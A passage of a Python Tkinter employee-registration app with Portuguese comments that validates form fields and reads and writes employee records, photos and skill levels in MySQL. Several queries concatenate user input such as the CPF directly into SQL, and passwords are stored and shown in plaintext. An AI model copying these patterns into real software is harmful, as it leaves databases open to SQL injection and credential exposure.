if a == '' or b == '' or c == '' or d == '' or e == 'Selecione' or f == '' or g == '' or self.box1.get() == '' or self.box2.get() == '' or self.box3.get() == '' or self.box4.get() == '' or self.box5.get() == '' or self.box6.get() == '' or self.box7.get() == '' or self.box8.get() == '' or self.box9.get() == '' or self.box10.get() == '' or self.box11.get() == '' or self.box12.get() == '' or self.box13.get() == '' or self.box14.get() == '' or self.box15.get() == '' or self.box16.get() == '' or self.box17.get() == '' or self.box18.get() == '' or self.box19.get() == '' or self.box20.get() == '' or self.box21.get() == '' or self.box22.get() == '' or self.box23.get() == '' or self.box24.get() == '' or self.box25.get() == '' or self.box26.get() == '' or self.box27.get() == '' or self.box28.get() == '' or self.box29.get() == '' or self.box30.get() == '' or self.box31.get() == '' or self.box32.get() == '' or self.box33.get() == '' or self.box34.get() == '' or self.box35.get() == '' or self.box36.get() == '' or self.box37.get() == '' or self.box38.get() == '' or self.box39.get() == '' or self.box40.get() == '' or self.box41.get() == '':
#Mudando cor para preto caso o usuário tenha errado em algum campo e tenha corrigdo
self.lbNome['fg'] = '#4c78ff'
self.lbCPF['fg'] = '#4c78ff'
self.lbFuncao['fg'] = '#4c78ff'
self.lbFone['fg'] = '#4c78ff'
self.lbNasc['fg'] = '#4c78ff'
self.lbSenha['fg'] = '#4c78ff'
self.lbConfirmaSenha['fg'] = '#4c78ff'
self.campoNome['bg'] = 'white'
self.campoCPF['bg'] = 'white'
self.campoFone['bg'] = 'white'
self.campoNasc['bg'] = 'white'
self.campoSenha['bg'] = 'white'
self.campoConfirmaSenha['bg'] = 'white'
self.lbAtribuicao1['fg'] = '#4c78ff'
self.lbAtribuicao2['fg'] = '#4c78ff'
self.lbAtribuicao3['fg'] = '#4c78ff'
self.lbAtribuicao4['fg'] = '#4c78ff'
self.lbAtribuicao5['fg'] = '#4c78ff'
self.lbAtribuicao6['fg'] = '#4c78ff'
self.lbAtribuicao7['fg'] = '#4c78ff'
self.lbAtribuicao8['fg'] = '#4c78ff'
self.lbAtribuicao9['fg'] = '#4c78ff'
self.lbAtribuicao10['fg'] = '#4c78ff'
self.lbAtribuicao11['fg'] = '#4c78ff'
self.lbAtribuicao12['fg'] = '#4c78ff'
self.lbAtribuicao13['fg'] = '#4c78ff'
self.lbAtribuicao14['fg'] = '#4c78ff'
self.lbAtribuicao15['fg'] = '#4c78ff'
self.lbAtribuicao16['fg'] = '#4c78ff'
self.lbAtribuicao17['fg'] = '#4c78ff'
self.lbAtribuicao18['fg'] = '#4c78ff'
self.lbAtribuicao19['fg'] = '#4c78ff'
self.lbAtribuicao20['fg'] = '#4c78ff'
self.lbAtribuicao21['fg'] = '#4c78ff'
self.lbAtribuicao22['fg'] = '#4c78ff'
self.lbAtribuicao23['fg'] = '#4c78ff'
self.lbAtribuicao24['fg'] = '#4c78ff'
self.lbAtribuicao25['fg'] = '#4c78ff'
self.lbAtribuicao26['fg'] = '#4c78ff'
self.lbAtribuicao27['fg'] = '#4c78ff'
self.lbAtribuicao28['fg'] = '#4c78ff'
self.lbAtribuicao29['fg'] = '#4c78ff'
self.lbAtribuicao30['fg'] = '#4c78ff'
self.lbAtribuicao31['fg'] = '#4c78ff'
self.lbAtribuicao32['fg'] = '#4c78ff'
self.lbAtribuicao33['fg'] = '#4c78ff'
self.lbAtribuicao34['fg'] = '#4c78ff'
self.lbAtribuicao35['fg'] = '#4c78ff'
self.lbAtribuicao36['fg'] = '#4c78ff'
self.lbAtribuicao37['fg'] = '#4c78ff'
self.lbAtribuicao38['fg'] = '#4c78ff'
self.lbAtribuicao39['fg'] = '#4c78ff'
self.lbAtribuicao40['fg'] = '#4c78ff'
if a == '':
self.campoNome['bg'] = 'pink'
self.lbNome['fg'] = 'red'
if b == '':
self.campoCPF['bg'] = 'pink'
self.lbCPF['fg'] = 'red'
if c == '':
self.campoSenha['bg'] = 'pink'
self.lbSenha['fg'] = 'red'
if d == '':
self.campoConfirmaSenha['bg'] = 'pink'
self.lbConfirmaSenha['fg'] = 'red'
if e == 'Selecione':
self.lbFuncao['fg'] = 'red'
if f == '':
self.campoFone['bg'] = 'pink'
self.lbFone['fg'] = 'red'
if g == '':
self.campoNasc['bg'] = 'pink'
self.lbNasc['fg'] = 'red'
if self.box1.get() == '' or int(self.box1.get()) > 4:
self.lbAtribuicao1['fg'] = 'red'
if self.box2.get() == '' or int(self.box2.get()) > 4:
self.lbAtribuicao2['fg'] = 'red'
if self.box3.get() == '' or int(self.box3.get()) > 4:
self.lbAtribuicao3['fg'] = 'red'
if self.box4.get() == '' or int(self.box4.get()) > 4:
self.lbAtribuicao4['fg'] = 'red'
if self.box5.get() == '' or int(self.box5.get()) > 4:
self.lbAtribuicao5['fg'] = 'red'
if self.box6.get() == '' or int(self.box6.get()) > 4:
self.lbAtribuicao6['fg'] = 'red'
if self.box7.get() == '' or int(self.box7.get()) > 4:
self.lbAtribuicao7['fg'] = 'red'
if self.box8.get() == '' or int(self.box8.get()) > 4:
self.lbAtribuicao8['fg'] = 'red'
if self.box9.get() == '' or int(self.box9.get()) > 4:
self.lbAtribuicao9['fg'] = 'red'
if self.box10.get() == '' or int(self.box10.get()) > 4:
self.lbAtribuicao10['fg'] = 'red'
if self.box11.get() == '' or int(self.box11.get()) > 4:
self.lbAtribuicao11['fg'] = 'red'
if self.box12.get() == '' or int(self.box12.get()) > 4:
self.lbAtribuicao12['fg'] = 'red'
if self.box13.get() == '' or int(self.box13.get()) > 4:
self.lbAtribuicao13['fg'] = 'red'
if self.box14.get() == '' or int(self.box14.get()) > 4:
self.lbAtribuicao14['fg'] = 'red'
if self.box15.get() == '' or int(self.box15.get()) > 4:
self.lbAtribuicao15['fg'] = 'red'
if self.box16.get() == '' or int(self.box16.get()) > 4:
self.lbAtribuicao16['fg'] = 'red'
if self.box17.get() == '' or int(self.box17.get()) > 4:
self.lbAtribuicao17['fg'] = 'red'
if self.box18.get() == '' or int(self.box18.get()) > 4:
self.lbAtribuicao18['fg'] = 'red'
if self.box19.get() == '' or int(self.box19.get()) > 4:
self.lbAtribuicao19['fg'] = 'red'
if self.box20.get() == '' or int(self.box20.get()) > 4:
self.lbAtribuicao20['fg'] = 'red'
if self.box21.get() == '' or int(self.box21.get()) > 4:
self.lbAtribuicao21['fg'] = 'red'
if self.box22.get() == '' or int(self.box22.get()) > 4:
self.lbAtribuicao22['fg'] = 'red'
if self.box23.get() == '' or int(self.box23.get()) > 4:
self.lbAtribuicao23['fg'] = 'red'
if self.box24.get() == '' or int(self.box24.get()) > 4:
self.lbAtribuicao24['fg'] = 'red'
if self.box25.get() == '' or int(self.box25.get()) > 4:
self.lbAtribuicao25['fg'] = 'red'
if self.box26.get() == '' or int(self.box26.get()) > 4:
self.lbAtribuicao26['fg'] = 'red'
if self.box27.get() == '' or int(self.box27.get()) > 4:
self.lbAtribuicao27['fg'] = 'red'
if self.box28.get() == '' or int(self.box28.get()) > 4:
self.lbAtribuicao28['fg'] = 'red'
if self.box29.get() == '' or int(self.box29.get()) > 4:
self.lbAtribuicao29['fg'] = 'red'
if self.box30.get() == '' or int(self.box30.get()) > 4:
self.lbAtribuicao30['fg'] = 'red'
if self.box31.get() == '' or int(self.box31.get()) > 4:
self.lbAtribuicao31['fg'] = 'red'
if self.box32.get() == '' or int(self.box32.get()) > 4:
self.lbAtribuicao32['fg'] = 'red'
if self.box33.get() == '' or int(self.box33.get()) > 4:
self.lbAtribuicao33['fg'] = 'red'
if self.box34.get() == '' or int(self.box34.get()) > 4:
self.lbAtribuicao34['fg'] = 'red'
if self.box35.get() == '' or int(self.box35.get()) > 4:
self.lbAtribuicao35['fg'] = 'red'
if self.box36.get() == '' or int(self.box36.get()) > 4:
self.lbAtribuicao36['fg'] = 'red'
if self.box37.get() == '' or int(self.box37.get()) > 4:
self.lbAtribuicao37['fg'] = 'red'
if self.box38.get() == '' or int(self.box38.get()) > 4:
self.lbAtribuicao38['fg'] = 'red'
if self.box39.get() == '' or int(self.box39.get()) > 4:
self.lbAtribuicao39['fg'] = 'red'
if self.box40.get() == '' or int(self.box40.get()) > 4:
self.lbAtribuicao40['fg'] = 'red'
if self.box41.get() == '' or int(self.box41.get()) > 4:
self.lbAtribuicao41['fg'] = 'red'
return messagebox.showerror('Alerta', 'Verifique os campos')
elif len(a) < 6 or len(b) < 11 or len(c) < 8 or len(d) < 8 or c != d:
#Mudando cor para preto caso o usuário tenha errado em algum campo e tenha corrigdo
self.lbNome['fg'] = '#4c78ff'
self.lbCPF['fg'] = '#4c78ff'
self.lbSenha['fg'] = '#4c78ff'
self.lbConfirmaSenha['fg'] = '#4c78ff'
self.campoNome['bg'] = 'white'
self.campoCPF['bg'] = 'white'
self.campoSenha['bg'] = 'white'
self.campoConfirmaSenha['bg'] = 'white'
if len(a) < 6:
self.campoNome['bg'] = 'pink'
self.lbNome['fg'] = 'red'
if len(b) < 11:
self.campoCPF['bg'] = 'pink'
self.lbCPF['fg'] = 'red'
if len(c) < 8:
self.campoSenha['bg'] = 'pink'
self.lbSenha['fg'] = 'red'
if len(d) < 8:
self.campoConfirmaSenha['bg'] = 'pink'
self.lbConfirmaSenha['fg'] = 'red'
return messagebox.showerror('Alerta', 'Verifique os campos')
self.lbNome['fg'] = '#4c78ff'
self.lbCPF['fg'] = '#4c78ff'
self.lbSenha['fg'] = '#4c78ff'
self.lbConfirmaSenha['fg'] = '#4c78ff'
self.campoNome['bg'] = 'white'
self.campoCPF['bg'] = 'white'
self.campoSenha['bg'] = 'white'
self.campoConfirmaSenha['bg'] = 'white'
self.lbAtribuicao1['fg'] = '#4c78ff'
self.lbAtribuicao2['fg'] = '#4c78ff'
self.lbAtribuicao3['fg'] = '#4c78ff'
self.lbAtribuicao4['fg'] = '#4c78ff'
self.lbAtribuicao5['fg'] = '#4c78ff'
self.lbAtribuicao6['fg'] = '#4c78ff'
self.lbAtribuicao7['fg'] = '#4c78ff'
self.lbAtribuicao8['fg'] = '#4c78ff'
self.lbAtribuicao9['fg'] = '#4c78ff'
self.lbAtribuicao10['fg'] = '#4c78ff'
self.lbAtribuicao11['fg'] = '#4c78ff'
self.lbAtribuicao12['fg'] = '#4c78ff'
self.lbAtribuicao13['fg'] = '#4c78ff'
self.lbAtribuicao14['fg'] = '#4c78ff'
self.lbAtribuicao15['fg'] = '#4c78ff'
self.lbAtribuicao16['fg'] = '#4c78ff'
self.lbAtribuicao17['fg'] = '#4c78ff'
self.lbAtribuicao18['fg'] = '#4c78ff'
self.lbAtribuicao19['fg'] = '#4c78ff'
self.lbAtribuicao20['fg'] = '#4c78ff'
self.lbAtribuicao21['fg'] = '#4c78ff'
self.lbAtribuicao22['fg'] = '#4c78ff'
self.lbAtribuicao23['fg'] = '#4c78ff'
self.lbAtribuicao24['fg'] = '#4c78ff'
self.lbAtribuicao25['fg'] = '#4c78ff'
self.lbAtribuicao26['fg'] = '#4c78ff'
self.lbAtribuicao27['fg'] = '#4c78ff'
self.lbAtribuicao28['fg'] = '#4c78ff'
self.lbAtribuicao29['fg'] = '#4c78ff'
self.lbAtribuicao30['fg'] = '#4c78ff'
self.lbAtribuicao31['fg'] = '#4c78ff'
self.lbAtribuicao32['fg'] = '#4c78ff'
self.lbAtribuicao33['fg'] = '#4c78ff'
self.lbAtribuicao34['fg'] = '#4c78ff'
self.lbAtribuicao35['fg'] = '#4c78ff'
self.lbAtribuicao36['fg'] = '#4c78ff'
self.lbAtribuicao37['fg'] = '#4c78ff'
self.lbAtribuicao38['fg'] = '#4c78ff'
self.lbAtribuicao39['fg'] = '#4c78ff'
self.lbAtribuicao40['fg'] = '#4c78ff'
cont1 = 0
cont2 = 0
#Verificando se o campo de telefone foi digitado corretamente
for caracter in f:
if caracter.isnumeric():
cont1 +=1
elif not caracter.isnumeric():
cont2 +=1
if cont1 != 11 or cont2 != 4:
self.lbFone['fg'] = 'red'
self.campoFone['bg'] = 'pink'
return messagebox.showerror('Alerta', 'Verifique os campos')
else:
self.lbFone['fg'] = '#4c78ff'
self.campoFone['bg'] = 'white'
cont1 = 0
cont2 = 0
#Verificando se o campo de data de nascimento foi digitado corretamente
for caracter in g:
if caracter.isnumeric():
cont1 +=1
elif not caracter.isnumeric():
cont2 +=1
if cont1 != 8 or cont2 != 2:
self.lbNasc['fg'] = 'red'
self.campoNasc['bg'] = 'pink'
return messagebox.showerror('Alerta', 'Verifique os campos')
else:
self.lbNasc['fg'] = '#4c78ff'
self.campoNasc['bg'] = 'white'
try:
if self.bancoServer.is_connected():
#Após a verificação invocará a função de cadastramento
if parametro == 'cadastrar':
self.inserindo_dados_cadastro()
#Após a verificação invocará a função para alteraçãod e registro
elif parametro == 'alterar':
self.alterar_dados_funcionarios()
except:
messagebox.showerror('Alerta', 'Erro conexão com Banco de Dados não estabelecida')
def inserindo_dados_cadastro(self):
#Abrindo imagem selecionada para perfil e codificando para binário
with open(self.arquivoIMG, 'rb') as arquivoBinary:
self.imageBinary = arquivoBinary.read()
try:
#Verificando se o CPF digitado no campo não já foi cadastrado no banco
self.cursor.execute("select count(CPF) from funcionarios where CPF = "+self.campoCPF.get()+" and Membro = 'inativo'")
verificaCPF = self.cursor.fetchall()[0][0]
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
return messagebox.showerror('Alerta', 'Erro ao realizar consulta com MySQL. Verifique a conexão com o banco')
if verificaCPF == 1:
if messagebox.askyesno('Alerta', 'O CPF: '+self.campoCPF.get()+' está inativo. Deseja reativá-lo novamente?'):
self.cursor.execute("update funcionarios set Membro = 'ativo' where CPF = "+self.campoCPF.get())
return messagebox.showinfo('Alerta', 'Usuário reativado com sucesso!')
else: return ''
try:
#Verificando se o CPF digitado no campo não está cadastrado no banco
self.cursor.execute("select count(CPF) from funcionarios where CPF = "+self.campoCPF.get())
verificaCPF = self.cursor.fetchall()[0][0]
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
return messagebox.showerror('Alerta', 'Erro ao realizar consulta com MySQL. Verifique a conexão com o banco')
if verificaCPF == 1:
return messagebox.showwarning('Alerta', 'O CPF - '+self.campoCPF.get()+', já possui cadastro')
#Atribuição dos campos cadastrais nas variáveis
a = self.campoNome.get().title()
b = self.campoCPF.get()
c = self.campoConfirmaSenha.get()
e = self.campoFuncao.get()
f = self.campoFone.get()
g = self.campoNasc.get()
#Formatando comando SQL com os dados a serem enviados
tp1 = "INSERT INTO funcionarios (ID, Nome, CPF, Senha, Funcao, Telefone, Data_Nasc, Foto) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)"
tp2 = ('id', a, b, c, e, f, g, self.imageBinary)
try:
#Executando comandos
self.cursor.execute(tp1, tp2)
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
return messagebox.showerror('Alerta', 'Erro ao inserir dados. Verifique a conexão com o banco')
#Inserindo dados cadastrado don funcionário no Banco de Dados Servidor
v1 = self.box1.get()
v2 = self.box2.get()
v3 = self.box3.get()
v4 = self.box4.get()
v5 = self.box5.get()
v6 = self.box6.get()
v7 = self.box7.get()
v8 = self.box8.get()
v9 = self.box9.get()
v10 = self.box10.get()
v11 = self.box11.get()
v12 = self.box12.get()
v13 = self.box13.get()
v14 = self.box14.get()
v15 = self.box15.get()
v16 = self.box16.get()
v17 = self.box17.get()
v18 = self.box18.get()
v19 = self.box19.get()
v20 = self.box20.get()
v21 = self.box21.get()
v22 = self.box22.get()
v23 = self.box23.get()
v24 = self.box24.get()
v25 = self.box25.get()
v26 = self.box26.get()
v27 = self.box27.get()
v28 = self.box28.get()
v29 = self.box29.get()
v30 = self.box30.get()
v31 = self.box31.get()
v32 = self.box32.get()
v33 = self.box33.get()
v34 = self.box34.get()
v35 = self.box35.get()
v36 = self.box36.get()
v37 = self.box37.get()
v38 = self.box38.get()
v39 = self.box39.get()
v40 = self.box40.get()
v41 = self.box41.get()
listaNivel = [v1,v2,v3,v4,v5,v6,v7,v8,v9,v10,v11,v12,v13,v14,v15,v16,v17,v18,v19,v20,v21,v22,v23,v24,v25,v26,v27,v28,v29,v30,v31,v32,v33,v34,v35,v36,v37,v38,v39,v40,v41]
self.cursor.execute("select id from funcionarios where CPF ='"+b+"'")
idOperador = self.cursor.fetchall()[0][0]
self.cursor.execute("select count(id) from operacao")
operacoesTotal = self.cursor.fetchall()[0][0]
try:
for idOperacao in range(operacoesTotal):
nivel = listaNivel[idOperacao]
idOperacao += 1
self.cursor.execute("INSERT INTO competencia (id, idOperador, idOperacao, Nivel) VALUES (DEFAULT, '"+str(idOperador)+"', '"+str(idOperacao)+"', '"+nivel+"')")
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
self.atualiza_valores_funcionario()
#Chamando função para exibir os funcionários cadastrados
self.exibir_funcionarios('cadastro')
if messagebox.showinfo('Alerta', 'Usuário cadastrado com sucesso!'):
self.limpar_aba_cadastrar('fim_cadastro')
def exibir_funcionarios(self, insert):
self.listaFuncionario = []
try:
#Exibindo Funcionários na Treeview
if self.bancoServer.is_connected():
if insert == 'funcionarios':
self.cursor.execute("select id, Nome, Funcao, CPF from funcionarios where Membro = 'ativo'")
valido = self.cursor.fetchall()
for i in range (len(valido)):
#extraindo do banco de dados as informações e armazenando nas variáveis
idd = valido[i][0]
nome = valido[i][1].title()
funcao = valido[i][2]
CPF = valido[i][3]
self.viewFuncionarios.insert("", "end", values=(idd, nome, funcao, CPF))
elif insert == 'cadastro':
self.cursor.execute("select id, Nome, Funcao, CPF from funcionarios where Membro = 'ativo' order by id desc limit 1")
valido = self.cursor.fetchall()
for i in range (len(valido)):
#extraindo do banco de dados as informações e armazenando nas variáveis
idd = valido[i][0]
nome = valido[i][1].title()
funcao = valido[i][2]
CPF = valido[i][3]
self.viewFuncionarios.insert("", "end", values=(idd, nome, funcao, CPF))
except: pass
def exibir_perfil_funcionarios(self, event):
#Pegando informações da lista selecionada
selecionada = self.viewFuncionarios.selection()[0]
x = self.viewFuncionarios.item(selecionada, "values")
i_d = x[0]
try:
self.cursor.execute("select id, Nome, CPF, Senha, Funcao, Telefone, Data_Nasc, Foto from funcionarios where id = "+i_d)
valido = self.cursor.fetchall()
except: return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
#Escondendo Label
self.labelAviso.place_forget()
for valor in valido:
idd, nome, CPF, senha, funcao, telefone, dataNasc, foto = valor
#Calculo para obter a idade do funcionário
v1 = int(dataNasc[6:])
v2 = int(datetime.now().date().strftime('%Y'))
idade = v2 - v1
self.lNome['text'] = nome
self.lIdade['text'] = str(idade)+' anos'
self.lFone['text'] = telefone
caminho = "FotoPerfil.png"
#Exibindo foto
with open(caminho, 'wb') as fotoConvertida:
fotoConvertida.write(foto)
self.abrirFoto = PhotoImage(file=caminho)
self.lbPerfil['image'] = self.abrirFoto
#Exibindo quantas OS Concluídas e Pausadas o Funcionário possui
try:
self.cursor.execute("select OS from concluidas where CPF ="+str(CPF))
valido = self.cursor.fetchall()
self.l_OS_Dados1['text'] = len(valido)
self.cursor.execute("select OS from pausas where CPF = '"+str(CPF)+"' and DataRetomada = 'none'")
valido = self.cursor.fetchall()
self.l_OS_Dados2['text'] = len(valido)
except: return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
#Exibindo widgets do perfil funcionários
self.botVer.place(relx=0.300, rely=0.800)
self.lNome.place(relx=0, rely=0.350, relwidth=1)
self.lIdade.place(relx=0, rely=0.400, relwidth=1)
self.lFone.place(relx=0, rely=0.450, relwidth=1)
self.l_OS_Con.place(relx=0.010, rely=0.540)
self.l_OS_Pen.place(relx=0.010, rely=0.590)
self.l_OS_Dados1.place(relx=0.410, rely=0.540)
self.l_OS_Dados2.place(relx=0.410, rely=0.590)
def limpar_perfil_funcionario(self):
self.lbPerfil['image'] = self.imgPerfil
self.lNome.place_forget()
self.lIdade.place_forget()
self.lFone.place_forget()
self.l_OS_Con.place_forget()
self.l_OS_Pen.place_forget()
self.l_OS_Dados1.place_forget()
self.l_OS_Dados2.place_forget()
self.labelAviso.place(relx=0.150, rely=0.400)
def deletar_perfil_funcionario(self):
#Pegando informações da lista selecionada
try:
selecionada = self.viewFuncionarios.selection()[0]
x = self.viewFuncionarios.item(selecionada, "values")
except: return ''
if messagebox.askyesno('Remover Funcionário', 'Deseja realmente excluir este usuário?'):
cpf = x[3]
try:
#self.cursor.execute('delete from funcionarios where CPF ='+cpf)
#self.cursor.execute('delete from habilidade_funcionarios where CPF ='+cpf)
self.cursor.execute("update funcionarios set Membro = 'inativo' where CPF ="+cpf)
messagebox.showinfo('Ação Concluída', 'Ação concluída com sucesso')
self.viewFuncionarios.delete(selecionada)
self.limpar_perfil_funcionario()
self.atualiza_valores_funcionario()
except: messagebox.showerror('Erro', 'Erro ao tentar fazer operação')
def editar_perfil_funcionario(self):
#Pegando informações da lista selecionada
try:
selecionada = self.viewFuncionarios.selection()[0]
x = self.viewFuncionarios.item(selecionada, "values")
i_d = x[0]
CPF = x[3]
except: return ''
#Tentando adquirir dados do banco
try:
self.cursor.execute("select Nome, CPF, Senha, Funcao, Telefone, Data_Nasc, Foto from funcionarios where id = '"+i_d+"'")
valido = self.cursor.fetchall()
self.abas.select(self.aba3)
except: return messagebox.showerror('Sem Conexão', 'Sem Conexão com o Banco de Dados')
self.cpf_funcionario = str(valido[0][1])
self.id_funcionario = i_d
#Deletando dados dos campos
self.campoNome.delete(0, END)
self.campoCPF.delete(0, END)
self.campoConfirmaSenha.delete(0, END)
self.campoSenha.delete(0, END)
self.campoFone.delete(0, END)
self.campoNasc.delete(0, END)
#Inserindo dados nos campos
self.campoNome.insert(END, valido[0][0])
self.campoCPF.insert(END, valido[0][1])
self.campoSenha.insert(END, valido[0][2])
self.campoConfirmaSenha.insert(END, valido[0][2])
self.campoFone.insert(END, valido[0][4])
self.campoNasc.insert(END, valido[0][5])
#Lógica para descobrir qual é a função selecionada do funcionário
a = self.campoFuncao['values']
b = valido[0][3]
for c in range(len(a)):
if a[c] == b:
self.campoFuncao.current(c)
try:
self.cursor.execute("select Nivel from competencia where idOperador = '"+i_d+"'")
valido = self.cursor.fetchall()
except Exception as erro:
print(f'errou 1 {erro}, {(erro.__class__)}')
return messagebox.showerror('Alerta', 'Verifique a conexão com o Servidor')
try:
self.box1.delete(0, END)
self.box2.delete(0, END)
self.box3.delete(0, END)
self.box4.delete(0, END)
self.box5.delete(0, END)
self.box6.delete(0, END)
self.box7.delete(0, END)
self.box8.delete(0, END)
self.box9.delete(0, END)
self.box10.delete(0, END)
self.box11.delete(0, END)
self.box12.delete(0, END)
self.box13.delete(0, END)
self.box14.delete(0, END)
self.box15.delete(0, END)
self.box16.delete(0, END)
self.box17.delete(0, END)
self.box18.delete(0, END)
self.box19.delete(0, END)
self.box20.delete(0, END)
self.box21.delete(0, END)
self.box22.delete(0, END)
self.box23.delete(0, END)
self.box24.delete(0, END)
self.box25.delete(0, END)
self.box26.delete(0, END)
self.box27.delete(0, END)
self.box28.delete(0, END)
self.box29.delete(0, END)
self.box30.delete(0, END)
self.box31.delete(0, END)
self.box32.delete(0, END)
self.box33.delete(0, END)
self.box34.delete(0, END)
self.box35.delete(0, END)
self.box36.delete(0, END)
self.box37.delete(0, END)
self.box38.delete(0, END)
self.box39.delete(0, END)
self.box40.delete(0, END)
self.box41.delete(0, END)
self.box1.insert(END, valido[0][0])
self.box2.insert(END, valido[1][0])
self.box3.insert(END, valido[2][0])
self.box4.insert(END, valido[3][0])
self.box5.insert(END, valido[4][0])
self.box6.insert(END, valido[5][0])
self.box7.insert(END, valido[6][0])
self.box8.insert(END, valido[7][0])
self.box9.insert(END, valido[8][0])
self.box10.insert(END, valido[9][0])
self.box11.insert(END, valido[10][0])
self.box12.insert(END, valido[11][0])
self.box13.insert(END, valido[12][0])
self.box14.insert(END, valido[13][0])
self.box15.insert(END, valido[14][0])
self.box16.insert(END, valido[15][0])
self.box17.insert(END, valido[16][0])
self.box18.insert(END, valido[17][0])
self.box19.insert(END, valido[18][0])
self.box20.insert(END, valido[19][0])
self.box21.insert(END, valido[20][0])
self.box22.insert(END, valido[21][0])
self.box23.insert(END, valido[22][0])
self.box24.insert(END, valido[23][0])
self.box25.insert(END, valido[24][0])
self.box26.insert(END, valido[25][0])
self.box27.insert(END, valido[26][0])
self.box28.insert(END, valido[27][0])
self.box29.insert(END, valido[28][0])
self.box30.insert(END, valido[29][0])
self.box31.insert(END, valido[30][0])
self.box32.insert(END, valido[31][0])
self.box33.insert(END, valido[32][0])
self.box34.insert(END, valido[33][0])
self.box35.insert(END, valido[34][0])
self.box36.insert(END, valido[35][0])
self.box37.insert(END, valido[36][0])
self.box38.insert(END, valido[37][0])
self.box39.insert(END, valido[38][0])
self.box40.insert(END, valido[39][0])
self.box41.insert(END, valido[40][0])
except: print('errou aqui')
#Configurando imagem da foto de perfil do funcionário
self.arquivoIMG = "FotoPerfil.png"
self.cookie = PhotoImage(file="FotoPerfil.png")
self.foto['image'] = self.cookie
#Alterando ícone de abrir ou editar imagem
self.imgAdd = PhotoImage(file='image/lapis.png')
self.add['image'] = self.imgAdd
self.add.place(relx=0.955, rely=0.700)
#Inserindo botão cancelar
self.imgCancelar = PhotoImage(file='image/cancelar.png')
self.botCancelar = Button(self.aba3, image=self.imgCancelar, bg='white', activebackground='white', border=0, command=lambda:self.limpar_aba_cadastrar('fim_alteração'))
self.botCancelar.place(relx=0.72, rely=0.90)
#Escondendo botão confirmar
self.botaoConfirmar.place_forget()
#Inserindo botão Alterar
self.imgAlterar = PhotoImage(file='image/Alterar.png')
self.botAlterar = Button(self.aba3, image=self.imgAlterar, bg='white', activebackground='white', border=0, command=lambda:self.verificar_campos_cadastro('alterar'))
self.botAlterar.place(relx=0.82, rely=0.90)
def limpar_aba_cadastrar(self, parametro):
#Deletando conteudo dos entry
self.campoNome.delete(0, END)
self.campoNome.focus_force()
self.campoCPF.delete(0, END)
self.campoConfirmaSenha.delete(0, END)
self.campoSenha.delete(0, END)
self.campoFuncao.current(0)
self.campoFone.delete(0, END)
self.campoNasc.delete(0, END)
#Reformulando dados padrões dos selects
self.box1.delete(0, END)
self.box2.delete(0, END)
self.box3.delete(0, END)
self.box4.delete(0, END)
self.box5.delete(0, END)
self.box6.delete(0, END)
self.box7.delete(0, END)
self.box8.delete(0, END)
self.box9.delete(0, END)
self.box10.delete(0, END)
self.box11.delete(0, END)
self.box12.delete(0, END)
self.box13.delete(0, END)
self.box14.delete(0, END)
self.box15.delete(0, END)
self.box16.delete(0, END)
self.box17.delete(0, END)
self.box18.delete(0, END)
self.box19.delete(0, END)
self.box20.delete(0, END)
self.box21.delete(0, END)
self.box22.delete(0, END)
self.box23.delete(0, END)
self.box24.delete(0, END)
self.box25.delete(0, END)
self.box26.delete(0, END)
self.box27.delete(0, END)
self.box28.delete(0, END)
self.box29.delete(0, END)
self.box30.delete(0, END)
self.box31.delete(0, END)
self.box32.delete(0, END)
self.box33.delete(0, END)
self.box34.delete(0, END)
self.box35.delete(0, END)
self.box36.delete(0, END)
self.box37.delete(0, END)
self.box38.delete(0, END)
self.box39.delete(0, END)
self.box40.delete(0, END)
self.box41.delete(0, END)
#Adicionando 0 ao limpar campos
self.box1.insert(END, '0')
self.box2.insert(END, '0')
self.box3.insert(END, '0')
self.box4.insert(END, '0')
self.box5.insert(END, '0')
self.box6.insert(END, '0')
self.box7.insert(END, '0')
self.box8.insert(END, '0')
self.box9.insert(END, '0')
self.box10.insert(END, '0')
self.box11.insert(END, '0')
self.box12.insert(END, '0')
self.box13.insert(END, '0')
self.box14.insert(END, '0')
self.box15.insert(END, '0')
self.box16.insert(END, '0')
self.box17.insert(END, '0')
self.box18.insert(END, '0')
self.box19.insert(END, '0')
self.box20.insert(END, '0')
self.box21.insert(END, '0')
self.box22.insert(END, '0')
self.box23.insert(END, '0')
self.box24.insert(END, '0')
self.box25.insert(END, '0')
self.box26.insert(END, '0')
self.box27.insert(END, '0')
self.box28.insert(END, '0')
self.box29.insert(END, '0')
self.box30.insert(END, '0')
self.box31.insert(END, '0')
self.box32.insert(END, '0')
self.box33.insert(END, '0')
self.box34.insert(END, '0')
self.box35.insert(END, '0')
self.box36.insert(END, '0')
self.box37.insert(END, '0')
self.box38.insert(END, '0')
self.box39.insert(END, '0')
self.box40.insert(END, '0')
self.box41.insert(END, '0')
#Reformulando imagem de Sem Perfil
self.foto['image'] = self.imgSemPerfil
self.arquivoIMG = 'image/sem_perfil.png'
self.imgAdd = PhotoImage(file='image/abrir.png')
self.add['image'] = self.imgAdd
self.add.place(relx=0.890, rely=0.580)
if parametro == 'fim_alteração':
#Destruindo botões Cancelar e Alterar
self.botCancelar.destroy()
self.botAlterar.destroy()
#Exibindo botão confirmar
self.botaoConfirmar.place(relx=0.82, rely=0.90)
def alterar_dados_funcionarios(self):
#Atribuição dos campos cadastrais nas variáveis
a = self.campoNome.get()
b = self.campoCPF.get()
c = self.campoSenha.get()
d = self.campoConfirmaSenha.get()
e = self.campoFuncao.get()
f = self.campoFone.get()
g = self.campoNasc.get()
#Verificando se o CPF digitado no campo não está cadastrado no banco
try:
self.cursor.execute("select CPF from funcionarios where CPF = '"+b+"' and id <> '"+self.id_funcionario+"'")
valido = self.cursor.fetchall()
except Exception as erro:
print(f'{erro}, {(erro.__class__)}')
if messagebox.showerror('Alerta', 'Erro ao realizar busca no Banco de Dados'):
return ''
if len(valido) == 1:
return messagebox.showinfo('Alerta', 'O CPF - '+self.campoCPF.get()+', pertence a outro funcionario')
#Atribuição dos valores dos boxes de seleção nas variáves
v1 = self.box1.get()
v2 = self.box2.get()
v3 = self.box3.get()
v4 = self.box4.get()
v5 = self.box5.get()
v6 = self.box6.get()
v7 = self.box7.get()
v8 = self.box8.get()
v9 = self.box9.get()
v10 = self.box10.get()
v11 = self.box11.get()
v12 = self.box12.get()
v13 = self.box13.get()
v14 = self.box14.get()
